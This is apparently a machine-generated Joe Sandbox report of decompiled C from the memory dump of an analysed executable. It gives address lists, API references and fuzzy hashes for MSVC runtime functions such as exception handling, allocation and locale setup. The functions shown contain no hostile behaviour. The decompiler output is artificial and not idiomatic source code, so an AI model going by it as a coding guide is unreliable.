                                                                                                                                    0x00407d2f
                                                                                                                                    0x00407d3d
                                                                                                                                    0x00407d45
                                                                                                                                    0x004079dc
                                                                                                                                    0x004079dc
                                                                                                                                    0x004079de
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004079eb
                                                                                                                                    0x004079f2
                                                                                                                                    0x00407a03
                                                                                                                                    0x00407a07
                                                                                                                                    0x00407a11
                                                                                                                                    0x00407a16
                                                                                                                                    0x00407a16
                                                                                                                                    0x00407a16
                                                                                                                                    0x00407a16
                                                                                                                                    0x00407a1f
                                                                                                                                    0x00407a25
                                                                                                                                    0x004079f4
                                                                                                                                    0x004079fc
                                                                                                                                    0x004079fc
                                                                                                                                    0x00407a2a
                                                                                                                                    0x00407a2d
                                                                                                                                    0x00407a2f
                                                                                                                                    0x00407a34
                                                                                                                                    0x00407a40
                                                                                                                                    0x00407a45
                                                                                                                                    0x00407a49
                                                                                                                                    0x00407a57
                                                                                                                                    0x00407a5c
                                                                                                                                    0x00407a5c
                                                                                                                                    0x00407a5c
                                                                                                                                    0x00407a36
                                                                                                                                    0x00407a36
                                                                                                                                    0x00407a39
                                                                                                                                    0x00407a39
                                                                                                                                    0x00407a60
                                                                                                                                    0x00407a6c
                                                                                                                                    0x00407a84
                                                                                                                                    0x00407ab1
                                                                                                                                    0x00407ab1
                                                                                                                                    0x00407ab5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407a88
                                                                                                                                    0x00407a8a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407a91
                                                                                                                                    0x00407a94
                                                                                                                                    0x00407a96
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00407a9a
                                                                                                                                    0x00407aa2
                                                                                                                                    0x00407aa7
                                                                                                                                    0x00407aa7
                                                                                                                                    0x00407aaa
                                                                                                                                    0x00407aad
                                                                                                                                    0x00407aaf
                                                                                                                                    0x00407aaf
                                                                                                                                    0x00407aad
                                                                                                                                    0x00407abc
                                                                                                                                    0x00407ac1
                                                                                                                                    0x00407ac8
                                                                                                                                    0x00407acf
                                                                                                                                    0x00000000
                                                                                                                                    0x00407acf

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00407908
                                                                                                                                    • std::ios_base::getloc.LIBCPMT ref: 0040791A
                                                                                                                                      • Part of subcall function 0040768E: __EH_prolog.LIBCMT ref: 00407693
                                                                                                                                      • Part of subcall function 0040768E: std::_Lockit::_Lockit.LIBCPMT ref: 004076A2
                                                                                                                                      • Part of subcall function 0040768E: int.LIBCPMT ref: 004076B9
                                                                                                                                      • Part of subcall function 004044AF: std::locale::facet::_Decref.LIBCPMT ref: 004044B5
                                                                                                                                    • _localeconv.LIBCMT ref: 0040798E
                                                                                                                                    • _strcspn.LIBCMT ref: 00407A7D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog$DecrefLockitLockit::__localeconv_strcspnstd::_std::ios_base::getlocstd::locale::facet::_
                                                                                                                                    • String ID: e
                                                                                                                                    • API String ID: 1404206736-4024072794
                                                                                                                                    • Opcode ID: 787bbe19399b7cabaf8b0364be174dea8987cd5cd58e79295b33d2c4deed4a8d
                                                                                                                                    • Instruction ID: a4b808b4456d7efbac534135dc16714a21d446d712c84a0f52f1b5bf7021d4fd
                                                                                                                                    • Opcode Fuzzy Hash: 787bbe19399b7cabaf8b0364be174dea8987cd5cd58e79295b33d2c4deed4a8d
                                                                                                                                    • Instruction Fuzzy Hash: 68E14A71900209AFDF01DF64CD41AEE7BB9FF48308F05416AF905B7292D739AA20DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E0040C7AB(intOrPtr __ecx) {
                                                                                                                                    				void* _t47;
                                                                                                                                    				intOrPtr _t48;
                                                                                                                                    				void* _t53;
                                                                                                                                    				void* _t54;
                                                                                                                                    				void* _t56;
                                                                                                                                    				intOrPtr _t57;
                                                                                                                                    				void* _t58;
                                                                                                                                    				void* _t61;
                                                                                                                                    
                                                                                                                                    				_push(0x2c);
                                                                                                                                    				_push(0x41ef98);
                                                                                                                                    				E0040EAC8(_t47, _t54, _t56);
                                                                                                                                    				_t48 = __ecx;
                                                                                                                                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                                                                                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                                                                                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x28)) = E004096AC(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040DABC(__ecx, _t53, _t61) + 0x88));
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040DABC(_t48, _t53, _t61) + 0x8c));
                                                                                                                                    				 *((intOrPtr*)(E0040DABC(_t48, _t53, _t61) + 0x88)) = _t57;
                                                                                                                                    				 *((intOrPtr*)(E0040DABC(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                                                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                                                                                    				 *(_t58 - 4) = 1;
                                                                                                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = E00409751(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                                                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                                                                                    				 *(_t58 - 4) = 0xfffffffe;
                                                                                                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                                                                                    				E0040C8D1(_t48, _t55, _t57);
                                                                                                                                    				return E0040EB0D( *((intOrPtr*)(_t58 - 0x1c)));
                                                                                                                                    			}











                                                                                                                                    0x0040c7ab
                                                                                                                                    0x0040c7ad
                                                                                                                                    0x0040c7b2
                                                                                                                                    0x0040c7b7
                                                                                                                                    0x0040c7b9
                                                                                                                                    0x0040c7bc
                                                                                                                                    0x0040c7bf
                                                                                                                                    0x0040c7c2
                                                                                                                                    0x0040c7c9
                                                                                                                                    0x0040c7da
                                                                                                                                    0x0040c7e8
                                                                                                                                    0x0040c7f6
                                                                                                                                    0x0040c7fe
                                                                                                                                    0x0040c80c
                                                                                                                                    0x0040c812
                                                                                                                                    0x0040c819
                                                                                                                                    0x0040c81c
                                                                                                                                    0x0040c832
                                                                                                                                    0x0040c835
                                                                                                                                    0x0040c8aa
                                                                                                                                    0x0040c8b1
                                                                                                                                    0x0040c8b8
                                                                                                                                    0x0040c8c5

                                                                                                                                    APIs
                                                                                                                                    • __CreateFrameInfo.LIBCMT ref: 0040C7D3
                                                                                                                                      • Part of subcall function 004096AC: __getptd.LIBCMT ref: 004096BA
                                                                                                                                      • Part of subcall function 004096AC: __getptd.LIBCMT ref: 004096C8
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7DD
                                                                                                                                      • Part of subcall function 0040DABC: __getptd_noexit.LIBCMT ref: 0040DABF
                                                                                                                                      • Part of subcall function 0040DABC: __amsg_exit.LIBCMT ref: 0040DACC
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7EB
                                                                                                                                    • __getptd.LIBCMT ref: 0040C7F9
                                                                                                                                    • __getptd.LIBCMT ref: 0040C804
                                                                                                                                    • _CallCatchBlock2.LIBCMT ref: 0040C82A
                                                                                                                                      • Part of subcall function 00409751: __CallSettingFrame@12.LIBCMT ref: 0040979D
                                                                                                                                      • Part of subcall function 0040C8D1: __getptd.LIBCMT ref: 0040C8E0
                                                                                                                                      • Part of subcall function 0040C8D1: __getptd.LIBCMT ref: 0040C8EE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1602911419-0
                                                                                                                                    • Opcode ID: 24e753c18136d6703b82038816351232e766446c083183a0adcd1b151d7d7dd7
                                                                                                                                    • Instruction ID: a93d93a7e5b63a3226b627edf6985b88e94d14ebbe1ff71b64586fe1efa045e1
                                                                                                                                    • Opcode Fuzzy Hash: 24e753c18136d6703b82038816351232e766446c083183a0adcd1b151d7d7dd7
                                                                                                                                    • Instruction Fuzzy Hash: 5811C6B1D04209DFDB00EFA5C445AAD7BB0FF08329F10856EF814A7292DB3D9A159F58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004103E3() {
                                                                                                                                    				intOrPtr _t5;
                                                                                                                                    				intOrPtr _t6;
                                                                                                                                    				intOrPtr _t10;
                                                                                                                                    				void* _t12;
                                                                                                                                    				intOrPtr _t15;
                                                                                                                                    				intOrPtr* _t16;
                                                                                                                                    				signed int _t19;
                                                                                                                                    				signed int _t20;
                                                                                                                                    				intOrPtr _t26;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    
                                                                                                                                    				_t5 =  *0x6108e0;
                                                                                                                                    				_t26 = 0x14;
                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                    					if(_t5 < _t26) {
                                                                                                                                    						_t5 = _t26;
                                                                                                                                    						goto L4;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t5 = 0x200;
                                                                                                                                    					L4:
                                                                                                                                    					 *0x6108e0 = _t5;
                                                                                                                                    				}
                                                                                                                                    				_t6 = E0040AFFA(_t5, 4);
                                                                                                                                    				 *0x60f8c0 = _t6;
                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                    					L8:
                                                                                                                                    					_t19 = 0;
                                                                                                                                    					_t15 = 0x4b3fe0;
                                                                                                                                    					while(1) {
                                                                                                                                    						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                                                                    						_t15 = _t15 + 0x20;
                                                                                                                                    						_t19 = _t19 + 4;
                                                                                                                                    						if(_t15 >= 0x4b4260) {
                                                                                                                                    							break;
                                                                                                                                    						}
                                                                                                                                    						_t6 =  *0x60f8c0;
                                                                                                                                    					}
                                                                                                                                    					_t27 = 0xfffffffe;
                                                                                                                                    					_t20 = 0;
                                                                                                                                    					_t16 = 0x4b3ff0;
                                                                                                                                    					do {
                                                                                                                                    						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x60f7c0 + (_t20 >> 5) * 4))));
                                                                                                                                    						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                                                                    							 *_t16 = _t27;
                                                                                                                                    						}
                                                                                                                                    						_t16 = _t16 + 0x20;
                                                                                                                                    						_t20 = _t20 + 1;
                                                                                                                                    					} while (_t16 < 0x4b4050);
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					 *0x6108e0 = _t26;
                                                                                                                                    					_t6 = E0040AFFA(_t26, 4);
                                                                                                                                    					 *0x60f8c0 = _t6;
                                                                                                                                    					if(_t6 != 0) {
                                                                                                                                    						goto L8;
                                                                                                                                    					} else {
                                                                                                                                    						_t12 = 0x1a;
                                                                                                                                    						return _t12;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}













                                                                                                                                    0x004103e3
                                                                                                                                    0x004103eb
                                                                                                                                    0x004103ee
                                                                                                                                    0x004103f9
                                                                                                                                    0x004103fb
                                                                                                                                    0x00000000
                                                                                                                                    0x004103fb
                                                                                                                                    0x004103f0
                                                                                                                                    0x004103f0
                                                                                                                                    0x004103fd
                                                                                                                                    0x004103fd
                                                                                                                                    0x004103fd
                                                                                                                                    0x00410405
                                                                                                                                    0x0041040c
                                                                                                                                    0x00410413
                                                                                                                                    0x00410433
                                                                                                                                    0x00410433
                                                                                                                                    0x00410435
                                                                                                                                    0x00410441
                                                                                                                                    0x00410441
                                                                                                                                    0x00410444
                                                                                                                                    0x00410447
                                                                                                                                    0x00410450
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041043c
                                                                                                                                    0x0041043c
                                                                                                                                    0x00410454
                                                                                                                                    0x00410455
                                                                                                                                    0x00410457
                                                                                                                                    0x0041045d
                                                                                                                                    0x00410471
                                                                                                                                    0x00410477
                                                                                                                                    0x00410481
                                                                                                                                    0x00410481
                                                                                                                                    0x00410483
                                                                                                                                    0x00410486
                                                                                                                                    0x00410487
                                                                                                                                    0x00410493
                                                                                                                                    0x00410415
                                                                                                                                    0x00410418
                                                                                                                                    0x0041041e
                                                                                                                                    0x00410425
                                                                                                                                    0x0041042c
                                                                                                                                    0x00000000
                                                                                                                                    0x0041042e
                                                                                                                                    0x00410430
                                                                                                                                    0x00410432
                                                                                                                                    0x00410432
                                                                                                                                    0x0041042c

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __calloc_crt
                                                                                                                                    • String ID: P@K$`BK$?K
                                                                                                                                    • API String ID: 3494438863-4083877936
                                                                                                                                    • Opcode ID: ec80102f5f46426d3e6c0cef2709ccc99b6e64d2d36c219094e056cfc49c1d27
                                                                                                                                    • Instruction ID: 29d1fe06b53f28424d6a53b3624031d6e34808b2df040c3d2bc13b09e913f6a3
                                                                                                                                    • Opcode Fuzzy Hash: ec80102f5f46426d3e6c0cef2709ccc99b6e64d2d36c219094e056cfc49c1d27
                                                                                                                                    • Instruction Fuzzy Hash: 43110D3174821187E7249B1EBC906E623D6FB84764B14962BF715CA3D0D7B8C8C1568D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                    			E0040FC86() {
                                                                                                                                    				signed long long _v12;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed long long _v28;
                                                                                                                                    				signed char _t8;
                                                                                                                                    
                                                                                                                                    				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                    					L6:
                                                                                                                                    					_v20 =  *0x402128;
                                                                                                                                    					_v28 =  *0x402120;
                                                                                                                                    					asm("fsubr qword [ebp-0x18]");
                                                                                                                                    					_v12 = _v28 / _v20 * _v20;
                                                                                                                                    					asm("fld1");
                                                                                                                                    					asm("fcomp qword [ebp-0x8]");
                                                                                                                                    					asm("fnstsw ax");
                                                                                                                                    					if((_t8 & 0x00000005) != 0) {
                                                                                                                                    						return 0;
                                                                                                                                    					} else {
                                                                                                                                    						return 1;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                    					if(__eax == 0) {
                                                                                                                                    						goto L6;
                                                                                                                                    					} else {
                                                                                                                                    						_push(0);
                                                                                                                                    						return __eax;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}







                                                                                                                                    0x0040fc8b
                                                                                                                                    0x0040fc93
                                                                                                                                    0x0040fcaa
                                                                                                                                    0x0040fc56
                                                                                                                                    0x0040fc5f
                                                                                                                                    0x0040fc6b
                                                                                                                                    0x0040fc6e
                                                                                                                                    0x0040fc71
                                                                                                                                    0x0040fc73
                                                                                                                                    0x0040fc76
                                                                                                                                    0x0040fc7b
                                                                                                                                    0x0040fc85
                                                                                                                                    0x0040fc7d
                                                                                                                                    0x0040fc81
                                                                                                                                    0x0040fc81
                                                                                                                                    0x0040fc95
                                                                                                                                    0x0040fc9b
                                                                                                                                    0x0040fca3
                                                                                                                                    0x00000000
                                                                                                                                    0x0040fca5
                                                                                                                                    0x0040fca5
                                                                                                                                    0x0040fca9
                                                                                                                                    0x0040fca9
                                                                                                                                    0x0040fca3

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32,00409CD3), ref: 0040FC8B
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040FC9B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                    • String ID: IsProcessorFeaturePresent$KERNEL32$NhvPhv
                                                                                                                                    • API String ID: 1646373207-1530169644
                                                                                                                                    • Opcode ID: b7771e77f4e4013358888e9e098e99f71da8d51641cc321442b561020c80c306
                                                                                                                                    • Instruction ID: 9e109d7cdd56908a8c9d210d2126d543630f1e76998d0381872d07b936c5d2c3
                                                                                                                                    • Opcode Fuzzy Hash: b7771e77f4e4013358888e9e098e99f71da8d51641cc321442b561020c80c306
                                                                                                                                    • Instruction Fuzzy Hash: 35F05B30504A0DD2EF101BA1AE0F76F7B74BB84706F9105B1E5D6B04D4DF7890B9D259
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                    			E004097EE(intOrPtr _a4) {
                                                                                                                                    				signed int _v16;
                                                                                                                                    				char _v20;
                                                                                                                                    				long _v24;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				void* _v36;
                                                                                                                                    				long _v40;
                                                                                                                                    				void _v60;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* _t20;
                                                                                                                                    				signed int _t21;
                                                                                                                                    				signed int _t26;
                                                                                                                                    				DWORD* _t27;
                                                                                                                                    				void* _t30;
                                                                                                                                    				signed int _t34;
                                                                                                                                    				void* _t38;
                                                                                                                                    				void* _t39;
                                                                                                                                    
                                                                                                                                    				while(1) {
                                                                                                                                    					_t20 = E0040D2C2(_t30, _t38, _t39, _a4);
                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_t21 = E0040DDFB(_a4);
                                                                                                                                    					__eflags = _t21;
                                                                                                                                    					if(_t21 == 0) {
                                                                                                                                    						__eflags =  *0x60ebf0 & 0x00000001;
                                                                                                                                    						if(( *0x60ebf0 & 0x00000001) == 0) {
                                                                                                                                    							 *0x60ebf0 =  *0x60ebf0 | 0x00000001;
                                                                                                                                    							__eflags =  *0x60ebf0;
                                                                                                                                    							E004097D3(0x60ebe4);
                                                                                                                                    							E0040B298( *0x60ebf0, 0x41c545);
                                                                                                                                    						}
                                                                                                                                    						E004053F1( &_v16, 0x60ebe4);
                                                                                                                                    						_push(0x41e594);
                                                                                                                                    						_push( &_v16);
                                                                                                                                    						L7();
                                                                                                                                    						asm("int3");
                                                                                                                                    						_push(0x60ebe4);
                                                                                                                                    						_push(_t39);
                                                                                                                                    						_t34 = 8;
                                                                                                                                    						_v36 = memcpy( &_v60, 0x4016c0, _t34 << 2);
                                                                                                                                    						_t26 = _v16;
                                                                                                                                    						_v32 = _t26;
                                                                                                                                    						__eflags = _t26;
                                                                                                                                    						if(_t26 != 0) {
                                                                                                                                    							__eflags =  *_t26 & 0x00000008;
                                                                                                                                    							if(( *_t26 & 0x00000008) != 0) {
                                                                                                                                    								_v20 = 0x1994000;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t27 =  &_v20;
                                                                                                                                    						RaiseException(_v40, _v36, _v24, _t27);
                                                                                                                                    						return _t27;
                                                                                                                                    					} else {
                                                                                                                                    						continue;
                                                                                                                                    					}
                                                                                                                                    					L11:
                                                                                                                                    				}
                                                                                                                                    				return _t20;
                                                                                                                                    				goto L11;
                                                                                                                                    			}



















                                                                                                                                    0x00409805
                                                                                                                                    0x00409808
                                                                                                                                    0x00409810
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004097fb
                                                                                                                                    0x00409801
                                                                                                                                    0x00409803
                                                                                                                                    0x00409814
                                                                                                                                    0x00409820
                                                                                                                                    0x00409822
                                                                                                                                    0x00409822
                                                                                                                                    0x0040982b
                                                                                                                                    0x00409835
                                                                                                                                    0x0040983a
                                                                                                                                    0x0040983f
                                                                                                                                    0x00409844
                                                                                                                                    0x0040984c
                                                                                                                                    0x0040984d
                                                                                                                                    0x00409852
                                                                                                                                    0x0040985e
                                                                                                                                    0x0040985f
                                                                                                                                    0x00409862
                                                                                                                                    0x0040986d
                                                                                                                                    0x00409870
                                                                                                                                    0x00409874
                                                                                                                                    0x00409878
                                                                                                                                    0x0040987a
                                                                                                                                    0x0040987c
                                                                                                                                    0x0040987f
                                                                                                                                    0x00409881
                                                                                                                                    0x00409881
                                                                                                                                    0x0040987f
                                                                                                                                    0x00409888
                                                                                                                                    0x00409895
                                                                                                                                    0x0040989c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00409803
                                                                                                                                    0x00409813
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 00409808
                                                                                                                                      • Part of subcall function 0040D2C2: __FF_MSGBANNER.LIBCMT ref: 0040D2E5
                                                                                                                                      • Part of subcall function 0040D2C2: __NMSG_WRITE.LIBCMT ref: 0040D2EC
                                                                                                                                      • Part of subcall function 0040D2C2: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,00409109,00000001,?,?,?,?,?,004042DF,?), ref: 0040D339
                                                                                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 0040982B
                                                                                                                                      • Part of subcall function 004097D3: std::exception::exception.LIBCMT ref: 004097DF
                                                                                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0040983F
                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040984D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.528799635.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.528625137.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530471772.000000000041E000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.530574405.0000000000422000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.531946697.00000000004B3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532028403.000000000060E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.532163376.0000000000611000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_6246.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                    • String ID: `
                                                                                                                                    • API String ID: 1411284514-931675499
                                                                                                                                    • Opcode ID: 5fd889ff2bcf2e2e40cb3a83e6085973780d8332874e2f8dabc048507d5fa9e2
                                                                                                                                    • Instruction ID: 036d937ee9e538ae195e56a8fd7f05b7b01bfde9e13578bc287517e9c901a4e5
                                                                                                                                    • Opcode Fuzzy Hash: 5fd889ff2bcf2e2e40cb3a83e6085973780d8332874e2f8dabc048507d5fa9e2
                                                                                                                                    • Instruction Fuzzy Hash: 09F0523A940229A2CB043B62EC0698A3B5A8F0235CF10803FF811712E3EF3D8D05819E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                    			E0040C4E7(void* __edx, intOrPtr* _a4) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				intOrPtr* _t15;
                                                                                                                                    				intOrPtr* _t18;
                                                                                                                                    				void* _t22;
                                                                                                                                    				void* _t24;
                                                                                                                                    				void* _t25;
                                                                                                                                    
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_t30 =  *((intOrPtr*)( *_a4)) - 0xe0434f4d;
                                                                                                                                    				if( *((intOrPtr*)( *_a4)) == 0xe0434f4d) {
                                                                                                                                    					__eflags =  *((intOrPtr*)(E0040DABC(_t22, __edx, __eflags) + 0x90));
                                                                                                                                    					if(__eflags > 0) {
                                                                                                                                    						_t15 = E0040DABC(_t22, __edx, __eflags) + 0x90;
                                                                                                                                    						 *_t15 =  *_t15 - 1;
                                                                                                                                    						__eflags =  *_t15;
                                                                                                                                    					}
                                                                                                                                    					goto L9;
                                                                                                                                    				} else {
                                                                                                                                    					__eflags = __eax - 0xe06d7363;
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						L9:
                                                                                                                                    						__eflags = 0;
                                                                                                                                    						return 0;
                                                                                                                                    					} else {
                                                                                                                                    						 *(E0040DABC(__ebx, __edx, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
                                                                                                                                    						_push(8);
                                                                                                                                    						_push(0x41edd0);
                                                                                                                                    						E0040EAC8(_t22, _t24, _t25);
                                                                                                                                    						_t18 =  *((intOrPtr*)(E0040DABC(_t22, __edx, _t30) + 0x78));
                                                                                                                                    						if(_t18 != 0) {
                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                    							 *_t18();
                                                                                                                                    							_v8 = 0xfffffffe;
                                                                                                                                    						}
                                                                                                                                    						return E0040EB0D(E00409D7C(_t22, _t23, _t24, _t25));
                                                                                                                                    					}
                                                                                                                                    				}
